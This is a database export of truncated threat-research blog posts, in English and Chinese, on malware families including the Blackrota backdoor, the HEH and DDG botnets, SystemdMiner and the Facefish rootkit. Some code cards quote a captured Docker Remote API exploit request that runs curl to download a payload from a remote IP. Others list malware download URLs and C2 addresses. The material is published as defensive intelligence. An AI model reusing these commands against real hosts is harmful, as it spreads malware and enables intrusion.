{"version":"0.3.1","atoms":[["soft-return","",{}]],"cards":[["image",{"src":"__GHOST_URL__/content/images/2021/03/status.png","alt":"","title":""}],["code",{"code":"POST /{VULN_URI} HTTP/1.1\nHost: {target}:{port}\n\n{...exec(\\\"curl -fsSL http://27.1.1.34:8080/docs/conf.txt -o /tmp/baby\\\")...}\n"}],["code",{"code":...
609615c33819e50007633d0c
post
null
2021-05-08T04:41:59.000Z
63873b9a8b1c1e0007f52fbf
blackrota-a-heavily-obfuscated-backdoor-written-in-go
0
2021-05-08T04:43:22.000Z
public
published
null
2020-11-24T04:41:00.000Z
Blackrota, a heavily obfuscated backdoor written in Go
<p>The most obfuscated Go-developed ELF-formatted malware we've found<br>to date.</p><h2 id="overview"><strong>Overview</strong></h2><p>Recently, a malicious backdoor program written in the Go language that<br>exploits an unauthorized access vulnerability in the Docker Remote API<br>was caught by the our <strong>Angler...
The most obfuscated Go-developed ELF-formatted malware we've found to date. Overview Recently, a malicious backdoor program written in the Go language that exploits an unauthorized access vulnerability in the Docker Remote API was caught by the our Anglerfish honeypot. We named it Blackrota, given that its C2 domain...
{"version":"0.3.1","atoms":[["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft...
609616973819e50007633d12
post
null
2021-05-08T04:44:06.000Z
63873b9a8b1c1e0007f52fc0
blackrota-yi-ge-gokai-fa-de-gao-du-hun-yao-de-hou-men
0
2021-05-08T04:44:39.000Z
public
published
null
2020-11-20T04:44:00.000Z
Blackrota, 一个Go开发的高度混淆的后门
<h1 id="-"><strong>概述</strong></h1><p>最近,我们通过 Anglerfish 蜜罐捕获到一个利用 Docker Remote API 未授权访问漏洞来传播的 Go 语言编写的恶意后门程序,鉴于它上线的 C2 为 <code>blackrota.ga</code> ,我们把它命名为 <strong>Blackrota</strong>。</p><p><strong>Blackrota</strong> 后门程序目前只有 Linux 版,为 ELF 文件格式,支持 x86/x86-64 两种 CPU 架构。<strong>Blackrota</strong> 基于 <a href="https://g...
概述 最近,我们通过 Anglerfish 蜜罐捕获到一个利用 Docker Remote API 未授权访问漏洞来传播的 Go 语言编写的恶意后门程序,鉴于它上线的 C2 为 blackrota.ga ,我们把它命名为 Blackrota。 Blackrota 后门程序目前只有 Linux 版,为 ELF 文件格式,支持 x86/x86-64 两种 CPU 架构。Blackrota 基于 geacon 配置并编译,geacon 是一个 Go 语言实现的 CobaltStrike Beacon,它可以作为 CobalStrike 的 Beacon 与 CobaltStrike 交互来控制失陷主机: 不过它只实现了原生 Coba...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2020/11/geacon.png","alt":"","title":""}],["code",{"code":"POST /v1.37/containers/create HTTP/1.1\nHost: {target_host}:{target_port}\nUser-Agent: Docker-Client/19.03.7 (linux)\nContent-Length: 1687\nContent-Type: application/json\n\n{\...
609617163819e50007633d17
post
null
2021-05-08T04:45:10.000Z
63873b9a8b1c1e0007f52fc1
heh-botnet-yi-ge-chu-yu-kai-fa-jie-duan-de-iot-p2p-botnet
0
2021-05-08T04:45:48.000Z
public
published
null
2020-11-09T04:45:00.000Z
HEH Botnet, 一个处于开发阶段的 IoT P2P Botnet
<h2 id="-"><strong>概述</strong></h2><p>近期 360Netlab 未知威胁检测系统捕获到一批未知恶意家族的样本,这一批样本支持的 CPU 架构有 x86(32/64), ARM(32/64), MIPS(MIPS32/MIPS-III) 以及 PPC,经过我们分析,将其命名为 <strong>HEH Botnet</strong>。HEH 是一个由 Go 语言编写的 IoT P2P Botnet,它的 P2P 协议不基于公开的任何 P2P 协议,而是自研协议。HEH 现阶段会通过暴力破解 <strong>23/2323</strong> 两个端口的 <strong>Telnet</strong> ...
概述 近期 360Netlab 未知威胁检测系统捕获到一批未知恶意家族的样本,这一批样本支持的 CPU 架构有 x86(32/64), ARM(32/64), MIPS(MIPS32/MIPS-III) 以及 PPC,经过我们分析,将其命名为 HEH Botnet。HEH 是一个由 Go 语言编写的 IoT P2P Botnet,它的 P2P 协议不基于公开的任何 P2P 协议,而是自研协议。HEH 现阶段会通过暴力破解 23/2323 两个端口的 Telnet 服务来传播,而不针对特定设备。 基于以下两点,我们认为它还处于开发测试阶段: 1. 整个僵尸网络的运作机制还不太成熟; 2. 部分指令还未实现。 根据 go_p...
{"version":"0.3.1","atoms":[],"cards":[["code",{"code":"/mnt/c/Users/brand/go/src/heh/attack.go\n/mnt/c/Users/brand/go/src/heh/commands.go\n/mnt/c/Users/brand/go/src/heh/structFun.go\n/mnt/c/Users/brand/go/src/heh/cryptotext.go\n/mnt/c/Users/brand/go/src/heh/httpserver.go\n/mnt/c/Users/brand/go/src/heh/killer.go\n/mnt/...
609617563819e50007633d1c
post
null
2021-05-08T04:46:33.000Z
63873b9a8b1c1e0007f52fc2
heh-a-new-iot-p2p-botnet-going-after-weak-telnet-services
0
2021-05-08T04:47:23.000Z
public
published
null
2020-10-07T04:46:00.000Z
HEH, a new IoT P2P Botnet going after weak telnet services
<h2 id="overview"><strong>Overview</strong></h2><p>Recently, 360Netlab threat detection system captured a batch of unknown samples. The CPU architectures supported by this batch of samples are broad, including x86(32/64), ARM(32/64), MIPS(MIPS32/MIPS-III) and PPC, it is spreading through brute force of the <strong>Teln...
Overview Recently, 360Netlab threat detection system captured a batch of unknown samples. The CPU architectures supported by this batch of samples are broad, including x86(32/64), ARM(32/64), MIPS(MIPS32/MIPS-III) and PPC, it is spreading through brute force of the Telnet service on ports 23/2323, which means the bot ...
{"version":"0.3.1","atoms":[],"cards":[["code",{"code":"/mnt/c/Users/brand/go/src/heh/attack.go\n/mnt/c/Users/brand/go/src/heh/commands.go\n/mnt/c/Users/brand/go/src/heh/structFun.go\n/mnt/c/Users/brand/go/src/heh/cryptotext.go\n/mnt/c/Users/brand/go/src/heh/httpserver.go\n/mnt/c/Users/brand/go/src/heh/killer.go\n/mnt/...
609617a93819e50007633d21
post
null
2021-05-08T04:48:21.000Z
63873b9a8b1c1e0007f52fc3
ddg-botnet-round-x-is-there-an-ending
0
2021-05-08T04:49:19.000Z
public
published
null
2020-04-08T04:48:00.000Z
DDG botnet, round X, is there an ending?
<p>DDG is a mining botnet that we first blogged about in Jan 2018, we reported back then that it had made a profit somewhere between 5.8million and 9.8million RMB(about 820,000 to 1.4Million US dollar ),  we have many follow up <a href="__GHOST_URL__/tag/ddg/"><strong>blogs </strong></a>about this botnet after that, bu...
DDG is a mining botnet that we first blogged about in Jan 2018, we reported back then that it had made a profit somewhere between 5.8million and 9.8million RMB(about 820,000 to 1.4Million US dollar ),  we have many follow up blogs about this botnet after that, but it shows no sign of slowing down. Since November 2019,...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2020/04/ddg_version_timeline-2.png","alt":"","title":""}]],"markups":[["a",["href","__GHOST_URL__/tag/ddg/"]],["strong"],["a",["href","__GHOST_URL__/ddg-a-mining-botnet-aiming-at-database-server-en/"]],["a",["href","https://github.com/...
609618153819e50007633d27
post
null
2021-05-08T04:49:34.000Z
63873b9a8b1c1e0007f52fc4
ddgde-xin-zheng-cheng-zi-yan-p2pxie-yi-gou-jian-hun-he-p2pwang-luo
0
2021-05-08T05:13:46.000Z
public
published
null
2020-05-07T04:50:00.000Z
DDG的新征程——自研P2P协议构建混合P2P网络
<h2 id="1-"><strong>1. 概述</strong></h2><p>DDG Mining Botnet 是一个活跃已久的挖矿僵尸网络,其主要的盈利方式是挖 XMR。从 2019.11 月份至今,我们的 Botnet 跟踪系统监控到 DDG Mining Botnet 一直在频繁跟新,其版本号和对应的更新时间如下图所示:</p><figure class="kg-card kg-image-card kg-card-hascaption"><img src="__GHOST_URL__/content/images/2020/04/ddg_version_timeline-1.png" class="kg-image"...
1. 概述 DDG Mining Botnet 是一个活跃已久的挖矿僵尸网络,其主要的盈利方式是挖 XMR。从 2019.11 月份至今,我们的 Botnet 跟踪系统监控到 DDG Mining Botnet 一直在频繁跟新,其版本号和对应的更新时间如下图所示: 其中,v4005~v4011 版本最主要的更新是把以前以 Hex 形式硬编码进样本的 HubList 数据,改成了 Gob 序列化的方式;v5009 及以后的版本,则摒弃了以前基于 Memberlist 来构建 P2P 网络的方式,改用自研的 P2P 协议来构建混合模式 P2P 网络 。简化的网络结构如下: 右边服务器是 C&C Server,DDG 中称它为 xh...
{"version":"0.3.1","atoms":[["soft-return","",{}]],"cards":[["image",{"src":"__GHOST_URL__/content/images/2020/04/ddg_version_timeline-1.png","alt":"","title":"","caption":"DDG Version Timeline"}],["image",{"src":"__GHOST_URL__/content/images/2020/04/hybrid_p2p_network-2.png","alt":"","title":"","caption":"P2P Hybrid M...
6096185e3819e50007633d2d
post
null
2021-05-08T04:51:51.000Z
63873b9a8b1c1e0007f52fc5
systemdminer-when-a-botnet-borrows-another-botnets-infrastructure
0
2021-05-08T04:52:50.000Z
public
published
null
2019-05-07T04:51:00.000Z
SystemdMiner,when a botnet borrows another botnet’s infrastructure
<h2 id="update-2019-4-26-17-30-"><strong>Update(2019.4.26 17:30)</strong></h2><p>About 3 hours after the release of this article, we found that the attacker took down the URL of some Payload downloads, the following URL has expired:</p><pre><code>aptgetgxqs3secda.onion.ly/systemd-cron.sh aptgetgxqs3secda.onion.pet/syst...
Update(2019.4.26 17:30) About 3 hours after the release of this article, we found that the attacker took down the URL of some Payload downloads, the following URL has expired: aptgetgxqs3secda.onion.ly/systemd-cron.sh aptgetgxqs3secda.onion.pet/systemd-cron.sh aptgetgxqs3secda.onion.ly/systemd-login-ddg aptgetgxqs3se...
{"version":"0.3.1","atoms":[],"cards":[["code",{"code":"aptgetgxqs3secda.onion.ly/systemd-cron.sh\naptgetgxqs3secda.onion.pet/systemd-cron.sh\naptgetgxqs3secda.onion.ly/systemd-login-ddg\naptgetgxqs3secda.onion.pet/systemd-login-ddg\naptgetgxqs3secda.onion.ly/systemd-resolve\naptgetgxqs3secda.onion.pet/systemd-resolve\...
609618e73819e50007633d33
post
null
2021-05-08T04:53:08.000Z
63873b9a8b1c1e0007f52fc6
systemdminer-jie-ji-xia-dan-tong-guo-ddg-chuan-bo-zi-shen
0
2021-05-08T04:54:04.000Z
public
published
null
2019-04-11T04:53:00.000Z
systemdMiner 借鸡下蛋,通过 DDG 传播自身
<h2 id="1-"><strong>1. 概述</strong></h2><p>在最近的关于 DDG.Mining.Botnet v3021/v3022 版本的 <a href="__GHOST_URL__/fast-analyze-ddg-v3021-and-v3022/">威胁快讯</a> 一文中,我们提到了 DDG 最近在用的主 C2:</p><pre><code>119.9.106.27 AS45187|RACKSPACE-AP Rackspace IT Hosting AS IT Hosting Provider Hong Kong, HK|Hong Kong|China </code></pre><p>2019...
1. 概述 在最近的关于 DDG.Mining.Botnet v3021/v3022 版本的 威胁快讯 一文中,我们提到了 DDG 最近在用的主 C2: 119.9.106.27 AS45187|RACKSPACE-AP Rackspace IT Hosting AS IT Hosting Provider Hong Kong, HK|Hong Kong|China 2019.4.19 日凌晨,我们发现 DDG 更新了其配置数据(CfgVer:23)和恶意 Shell 脚本 i.sh,在 i.sh 脚本的最后新增了一段陌生的 Shell 代码,这段 Shell 代码会在失陷主机下载一套全新的恶意程序,之后就会脱离 DD...
{"version":"0.3.1","atoms":[["soft-return","",{}]],"cards":[["code",{"code":"119.9.106.27 AS45187|RACKSPACE-AP Rackspace IT Hosting AS IT Hosting Provider Hong Kong, HK|Hong Kong|China\n"}],["code",{"code":"109.237.25.145 AS63949|LINODE-AP Linode, LLC|United Kingdom|London --> Main C&C\n104.128.230.16 AS62217|...
609619343819e50007633d39
post
null
2021-05-08T04:56:39.000Z
63873b9a8b1c1e0007f52fc7
shuang-qiang-mu-ma-ji-chu-she-shi-geng-xin-ji-xiang-ying-chuan-bo-fang-shi-fen-xi
0
2021-05-21T02:05:18.000Z
public
published
null
2018-12-28T04:56:00.000Z
“双枪”木马的基础设施更新及相应传播方式的分析
<h2 id="1-"><strong>1. 引述</strong></h2><p>2018.12.23 日,我们的 DNSMon 系统监测到以下三个异常的域名,经过研判这些域名属于 <strong>双枪</strong> 木马的网络基础设施。考虑到这些域名仅在最近才注册并启用,我们认为双枪木马近期在更新其基础设施,建议安全社区加以关注。</p><pre><code>white[.]gogo23424.com www[.]src135.com www[.]x15222.com </code></pre><p><strong>双枪</strong> 木马是目前我们见过的最复杂的恶意程序之一,最早由 360 安全卫士团队披露...
1. 引述 2018.12.23 日,我们的 DNSMon 系统监测到以下三个异常的域名,经过研判这些域名属于 双枪 木马的网络基础设施。考虑到这些域名仅在最近才注册并启用,我们认为双枪木马近期在更新其基础设施,建议安全社区加以关注。 white[.]gogo23424.com www[.]src135.com www[.]x15222.com 双枪 木马是目前我们见过的最复杂的恶意程序之一,最早由 360 安全卫士团队披露,并对其木马工作原理做了详细的技术分析。双枪木马本身集 Rootkit 和 Bootkit(同时感染 MBR 和 VBR)于一身,还有诸多对抗措施。除此之外,双枪木马恶意活动相关的网络基础设施...
{"version":"0.3.1","atoms":[],"cards":[["code",{"code":"white[.]gogo23424.com \nwww[.]src135.com \nwww[.]x15222.com \n"}],["image",{"src":"__GHOST_URL__/content/images/2018/12/IoC_relations_new.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2018/12/dns_rec_time_new-1.png","alt":"","title":"...
60961a073819e50007633d3f
post
null
2021-05-08T04:58:30.000Z
63873b9a8b1c1e0007f52fc8
threat-alert-ddg-3013-is-out
0
2021-05-08T04:59:12.000Z
public
published
null
2018-08-01T04:58:00.000Z
Threat Alert: DDG 3013 is Out
<p>DDG is a mining botnet mainly focusing on SSH, Redis databases and OrientDB database servers. We captured the first DDG botnet on October 25, 2017, and subsequently released several <a href="__GHOST_URL__/tag/ddg/">reports</a>. A recent <a href="__GHOST_URL__/old-botnets-never-die-and-ddg-refuse-to-fade-away/">repor...
DDG is a mining botnet mainly focusing on SSH, Redis databases and OrientDB database servers. We captured the first DDG botnet on October 25, 2017, and subsequently released several reports. A recent report was released in 2018-06, which reflected the newest version of DDG 3012 at that time. This morning, we noticed t...
{"version":"0.3.1","atoms":[],"cards":[["code",{"code":"149.56.106.215:8000 Canada/CA Pierrefonds \"AS16276 OVH SAS\" \n"}],["code",{"code":"hxxp://149.56.106.215:8000/i.sh #fca88105ed6f1fc72d25cfb30a0080b8 \nhxxp://149.56.106.215:8000/static/3011/ddgs.i686 #999fc24f53034b4c73866a0699be15fa \nh...
60961a763819e50007633d45
post
null
2021-05-08T04:59:27.000Z
63873b9a8b1c1e0007f52fc9
wei-xie-kuai-xun-ddg-3013-ban-ben
0
2021-05-08T04:59:53.000Z
public
published
null
2018-08-01T04:59:00.000Z
威胁快讯:DDG 3013 版本
<p>DDG 是一个专注于扫描控制 SSH 、 Redis数据库 和 OrientDB数据库 服务器,并攫取服务器算力挖矿(门罗币)的僵尸网络。我们在2017年10月25日首次感知到 DDG僵尸网络,并在随后发布了多份<a href="__GHOST_URL__/tag/ddg/">报告</a>。最近的一篇 <a href="__GHOST_URL__/old-botnets-never-die-and-ddg-refuse-to-fade-away/">报告</a> 发布于 2018-06,当时 DDG 的版本更新到 3012。</p><p>今晨,我们注意到 DDG 更新到版本 3013。</p><h4 id="ioc"><str...
DDG 是一个专注于扫描控制 SSH 、 Redis数据库 和 OrientDB数据库 服务器,并攫取服务器算力挖矿(门罗币)的僵尸网络。我们在2017年10月25日首次感知到 DDG僵尸网络,并在随后发布了多份报告。最近的一篇 报告 发布于 2018-06,当时 DDG 的版本更新到 3012。 今晨,我们注意到 DDG 更新到版本 3013。 IoC C2 149.56.106.215:8000 Canada/CA Pierrefonds "AS16276 OVH SAS" 下载URL hxxp://149.56.106.215:8000/i.sh hxxp://149.56.106.215:80...
{"version":"0.3.1","atoms":[],"cards":[["code",{"code":"149.56.106.215:8000 Canada/CA Pierrefonds \"AS16276 OVH SAS\" \n"}],["code",{"code":"hxxp://149.56.106.215:8000/i.sh \nhxxp://149.56.106.215:8000/static/3011/ddgs.i686 \nhxxp://149.56.106.215:8000/static/3011/ddgs.x86_64 \nhxxp://149.56.106.215:8000/stati...
60961aaf3819e50007633d4a
post
null
2021-05-08T05:00:21.000Z
63873b9a8b1c1e0007f52fca
old-botnets-never-die-and-ddg-refuse-to-fade-away
0
2021-05-08T05:01:17.000Z
public
published
null
2018-07-12T05:00:00.000Z
Old Botnets never Die, and DDG REFUSE to Fade Away
<p>DDG is a mining botnet that specializes in exploiting SSH, Redis database and OrientDB database servers. We first caught it on October 25, 2017, at that time, DDG used version number 2020 and 2021, and we noticed that the botnet has two internally reserved domain names that had not been registered. So we went ahead ...
DDG is a mining botnet that specializes in exploiting SSH, Redis database and OrientDB database servers. We first caught it on October 25, 2017, at that time, DDG used version number 2020 and 2021, and we noticed that the botnet has two internally reserved domain names that had not been registered. So we went ahead and...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2018/06/version-list-3.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2018/06/version_module_mapping-2.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2018/06/modules-list-2.png","alt"...
60961ae53819e50007633d4f
post
null
2021-05-08T05:01:31.000Z
63873b9a8b1c1e0007f52fcb
jiang-shi-yong-yuan-bu-si-ddgju-jue-diao-ling
0
2021-05-08T05:02:06.000Z
public
published
null
2018-07-12T05:01:00.000Z
僵尸永远不死,DDG拒绝凋零
<p>DDG 是一个专注于扫描控制 SSH 、 Redis数据库 和 OrientDB数据库 服务器,并攫取服务器算力挖矿(门罗币)的僵尸网络。我们在2017年10月25日首次感知到 DDG僵尸网络,并在随后展开了持续的分析和跟踪。在这期间,我们注意到该僵尸网络有两个内部保留域名尚未注册,我们抢注了这两个域名,并利用到这两个域名的流量精确记录了该僵尸网络感染的 4,391 个IP地址。在那段时间中,DDG 的主要流行版本是 2020、2021。以上内容详细记录在我们 2018年2月发布的 <a href="__GHOST_URL__/ddg-a-mining-botnet-aiming-at-database-server/">报告...
DDG 是一个专注于扫描控制 SSH 、 Redis数据库 和 OrientDB数据库 服务器,并攫取服务器算力挖矿(门罗币)的僵尸网络。我们在2017年10月25日首次感知到 DDG僵尸网络,并在随后展开了持续的分析和跟踪。在这期间,我们注意到该僵尸网络有两个内部保留域名尚未注册,我们抢注了这两个域名,并利用到这两个域名的流量精确记录了该僵尸网络感染的 4,391 个IP地址。在那段时间中,DDG 的主要流行版本是 2020、2021。以上内容详细记录在我们 2018年2月发布的 报告中。 有些僵尸网络的作者,会在我们发布分析报告之后悄然离去,比如 http81(persirai),但是 ddg 的作者选择留在场上。 DDG首...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2018/06/version-list---update-1.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2018/06/version_module_mapping-2.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2018/06/modules-list-2.p...
60961b2b3819e50007633d54
post
null
2021-05-08T05:02:30.000Z
63873b9a8b1c1e0007f52fcc
ddg-mining-botnet-jin-qi-huo-dong-fen-xi
0
2021-05-08T05:03:03.000Z
public
published
null
2018-06-13T05:02:00.000Z
DDG.Mining.Botnet 近期活动分析
<p><strong>UPDATE(2018.6.13)</strong></p><p>6.12 日,我们监测到 DDG.Mining.Botnet 又发布了新版本,最新版本为 v3012 ,更新概要如下:</p><ul><li>更换主 C2 为 <strong>69.64.32.12:8000</strong> ;</li><li>修改用来持久驻留的 i.sh 脚本;</li><li>更新备用 C2 IP 列表;</li><li>云端配置文件的结构、编码方式没有变化,只是里面涉及 C2 的内容指向最新的 C2;</li><li>矿机程序、矿池 Proxy以及 XMR Wallet 均未变化,Wallet 地址: <strong>4...
UPDATE(2018.6.13) 6.12 日,我们监测到 DDG.Mining.Botnet 又发布了新版本,最新版本为 v3012 ,更新概要如下: * 更换主 C2 为 69.64.32.12:8000 ; * 修改用来持久驻留的 i.sh 脚本; * 更新备用 C2 IP 列表; * 云端配置文件的结构、编码方式没有变化,只是里面涉及 C2 的内容指向最新的 C2; * 矿机程序、矿池 Proxy以及 XMR Wallet 均未变化,Wallet 地址: 42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2aPmAAVpHcPM8yoDEYD9Fy7eRvPJhR7S...
{"version":"0.3.1","atoms":[],"cards":[["image",{"src":"__GHOST_URL__/content/images/2018/06/C2_host.png","alt":"","title":""}],["code",{"code":"md5=e31c1d7a8025e7c3266a07e37c55a4ba uri=hxxp://69.64.32.12:8000/static/3012/ddgs.i686\nmd5=26b3aef91bacfa082deff9812acf7875 uri=hxxp://69.64.32.12:8000/static/3012/ddgs...
60961b663819e50007633d59
post
null
2021-05-08T05:05:34.000Z
63873b9a8b1c1e0007f52fcd
ddg-a-mining-botnet-aiming-at-database-servers
0
2021-05-08T05:06:12.000Z
public
published
null
2018-02-01T05:05:00.000Z
DDG: A Mining Botnet Aiming at Database Servers
<p>Starting 2017-10-25, we noticed there was a large scale ongoing scan targeting the OrientDB databases. Further analysis found that this is a long-running botnet whose main goal is to mine Monero CryptoCurrency. We name it <strong>DDG.Mining.Botnet</strong> after its core function module name DDG.</p><p>Currently we ...
Starting 2017-10-25, we noticed there was a large scale ongoing scan targeting the OrientDB databases. Further analysis found that this is a long-running botnet whose main goal is to mine Monero CryptoCurrency. We name it DDG.Mining.Botnet after its core function module name DDG. Currently we are able to confirm that ...
{"version":"0.3.1","atoms":[["soft-return","",{}]],"cards":[["image",{"src":"__GHOST_URL__/content/images/2018/01/ddg_total_incoming.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2017/11/atk_process.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2018/02/hub_asn.png",...
60961c1e3819e50007633d5e
post
null
2021-05-08T05:06:30.000Z
63873b9a8b1c1e0007f52fce
ddg-mining-botnet-yi-ge-miao-zhun-shu-ju-ku-fu-wu-qi-de-wa-kuang-jiang-shi-wang-luo
0
2021-05-08T05:07:03.000Z
public
published
null
2018-02-01T05:06:00.000Z
DDG.Mining.Botnet:一个瞄准数据库服务器的挖矿僵尸网络
<p>从 2017-10-25 开始,我们监控到有恶意代码在大规模扫描互联网上的 OrientDB 数据库服务器。进一步的分析发现,这是一个长期运营的僵尸网络,其主要目标是挖取门罗币(XMR,Monero CryptoCurrency)。我们将其命名为 <strong>DDG 挖矿僵尸网络</strong> (DDG Mining Botnet,以下简称 DDG) ,主要原因是因为其核心功能模块的名称为 DDG。</p><p>DDG 累积挖取的门罗币数目较大。目前我们能够确认该僵尸网络累积挖取的已经超过 <strong>3,395枚门罗币</strong>,按当前价格折合<strong>人民币 ¥5,821,657</strong>...
从 2017-10-25 开始,我们监控到有恶意代码在大规模扫描互联网上的 OrientDB 数据库服务器。进一步的分析发现,这是一个长期运营的僵尸网络,其主要目标是挖取门罗币(XMR,Monero CryptoCurrency)。我们将其命名为 DDG 挖矿僵尸网络 (DDG Mining Botnet,以下简称 DDG) ,主要原因是因为其核心功能模块的名称为 DDG。 DDG 累积挖取的门罗币数目较大。目前我们能够确认该僵尸网络累积挖取的已经超过 3,395枚门罗币,按当前价格折合人民币 ¥5,821,657 。另外因为矿池记账系统的问题,有2,428枚 XMR不能完全确认是否归属 DDG,按当前价格折合人民币 ¥4,163...
{"version":"0.3.1","atoms":[["soft-return","",{}]],"cards":[["image",{"src":"__GHOST_URL__/content/images/2018/01/ddg_total_incoming.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2017/11/atk_process.png","alt":"","title":""}],["image",{"src":"__GHOST_URL__/content/images/2018/02/hub_asn.png",...
60961c563819e50007633d63
post
null
2021-05-08T05:07:22.000Z
63873b9a8b1c1e0007f52fcf
mykings-yi-ge-da-gui-mo-duo-zhong-jiang-shi-wang-luo
0
2021-05-08T05:08:14.000Z
public
published
null
2018-01-29T05:07:00.000Z
MyKings: 一个大规模多重僵尸网络
<p>【更新记录】</p><pre><code>2018-01-24 原始文档首次公开,原先基于新浪blog的所有上联通道均已切断 2018-01-29 12:00 MyKings的上联通道开始使用新的blog url http://test886.hatenablog.com/entry/2018/01/26/002449,我们通过 https://twitter.com/360Netlab 发布了这一消息 2018-01-29 15:00 我们注意到上述 BLOG URL 已经被封 2018-01-29 05:00 https://twitter.com/ninoseki 告知,上述被封动作是 hantena 博客...
【更新记录】 2018-01-24 原始文档首次公开,原先基于新浪blog的所有上联通道均已切断 2018-01-29 12:00 MyKings的上联通道开始使用新的blog url http://test886.hatenablog.com/entry/2018/01/26/002449,我们通过 https://twitter.com/360Netlab 发布了这一消息 2018-01-29 15:00 我们注意到上述 BLOG URL 已经被封 2018-01-29 05:00 https://twitter.com/ninoseki 告知,上述被封动作是 hantena 博客安全团队处理的。 以下是原始...
{"version":"0.3.1","atoms":[["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft-return","",{}],["soft...
60961c8a3819e50007633d68
post
null
2021-05-26T08:59:45.000Z
63873b9a8b1c1e0007f52fd0
untitled-2
0
2021-05-26T09:25:05.000Z
public
draft
null
null
Test MathJax
<hr><!--kg-card-begin: markdown--><p>$$\sum_{i=0}^n i^2 = \frac{(n^2+n)(2n+1)}{6}$$</p> <!--kg-card-end: markdown--><!--kg-card-begin: markdown--><div> $$ A=\begin{bmatrix} a & b\\ c & d\\ e & f \end{bmatrix} $$ </div><!--kg-card-end: markdown-->
$$\sum_{i=0}^n i^2 = \frac{(n^2+n)(2n+1)}{6}$$ $$ A=\begin{bmatrix} a & b\\ c & d\\ e & f \end{bmatrix} $$
{"version":"0.3.1","atoms":[],"cards":[["hr",{}],["markdown",{"markdown":"$$\\sum_{i=0}^n i^2 = \\frac{(n^2+n)(2n+1)}{6}$$\n"}],["markdown",{"markdown":"<div> \n $$\n A=\\begin{bmatrix}\n a & b\\\\\n c & d\\\\\n e & f\n \\end{bmatrix}\n $$\n</div>"}]],"markups":[],"sections":[[10,0],[10,1],[10,2],[...
60ae0e013819e50007633f00
post
null
2021-05-26T13:48:51.000Z
63873b9a8b1c1e0007f52fd1
xin-wei-xie-androidjiang-shi-wang-luo-fen-xi-bao-gao
0
2022-05-06T09:46:13.000Z
public
draft
null
null
潜伏在STB设备中的幽灵:pandora 分析报告
null
null
{"version":"0.3.1","atoms":[],"cards":[],"markups":[],"sections":[[1,"p",[]]],"ghostVersion":"3.0"}
60ae51c33819e50007633f0b
post
null
2021-05-27T02:56:01.000Z
63873b9a8b1c1e0007f52fd2
ssh_stealer_facefish_en
0
2021-05-27T14:00:00.000Z
public
published
null
2021-05-27T14:00:00.000Z
Analysis report of the Facefish rootkit
<!--kg-card-begin: markdown--><h2 id="background">Background</h2> <p>In Feb 2021, we came across an ELF sample using some CWP’s Ndays exploits, we did some analysis, but after checking with a partner who has some nice visibility in network traffic in some China areas, we discovered there is literarily 0 hit for the C2 ...
Background In Feb 2021, we came across an ELF sample using some CWP’s Ndays exploits, we did some analysis, but after checking with a partner who has some nice visibility in network traffic in some China areas, we discovered there is literarily 0 hit for the C2 traffic. So we moved on. On 4/26/2021, Juniper publish...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"##Background\n\nIn Feb 2021, we came across an ELF sample using some CWP’s Ndays exploits, we did some analysis, but after checking with a partner who has some nice visibility in network traffic in some China areas, we discovered there is literarily 0 hit ...
60af0a413819e50007633f0f
post
null
2021-06-07T02:56:53.000Z
63873b9a8b1c1e0007f52fd3
wei-zhi-de-la-ji-you-jian-fa-song-xing-wei
0
2021-06-07T03:06:33.000Z
public
draft
null
null
未知的垃圾邮件发送行为
<h2 id="2021-05-13">2021-05-13</h2><p>同步一下DNSMon最近发现的一个现象,可能是和垃圾邮件相关,现在无法进一步实锤。</p><p>1. 在DNSMon中,从5.11开始,发现了大概15个形如 “^mail\.[a-z0-9]{5,7}\.cn” 的域名。解析的IP地址全部集中在百度。</p><!--kg-card-begin: markdown--><pre><code>mail.uizhx4t.cn mail.vm47jcn.cn mail.x1gi4me.cn mail.x3w13mq.cn mail.x98nb5r.cn mail.xico1d.cn mail.xs58782.cn m...
2021-05-13 同步一下DNSMon最近发现的一个现象,可能是和垃圾邮件相关,现在无法进一步实锤。 1. 在DNSMon中,从5.11开始,发现了大概15个形如 “^mail\.[a-z0-9]{5,7}\.cn” 的域名。解析的IP地址全部集中在百度。 mail.uizhx4t.cn mail.vm47jcn.cn mail.x1gi4me.cn mail.x3w13mq.cn mail.x98nb5r.cn mail.xico1d.cn mail.xs58782.cn mail.ylt19px.cn 2. 从域名whois注册人的邮箱来看,大部分都注册了超过1000个域名,应该是域名贩子或者是做域名出租生意的。...
{"version":"0.3.1","atoms":[],"cards":[["markdown",{"markdown":"```\nmail.uizhx4t.cn\nmail.vm47jcn.cn\nmail.x1gi4me.cn\nmail.x3w13mq.cn\nmail.x98nb5r.cn\nmail.xico1d.cn\nmail.xs58782.cn\nmail.ylt19px.cn\n```"}],["markdown",{"markdown":"```\n20210511 1.000000 175 mail.u5hymh4.cn # 被查询域名自身\n20210511 0...
60bd8af53819e5000763407c
post
null
2021-06-15T12:14:13.000Z
63873b9a8b1c1e0007f52fd4
p2p-ddos-pbot
0
2021-07-08T02:20:08.000Z
public
draft
null
null
新P2P Botnet: PBot分析简报
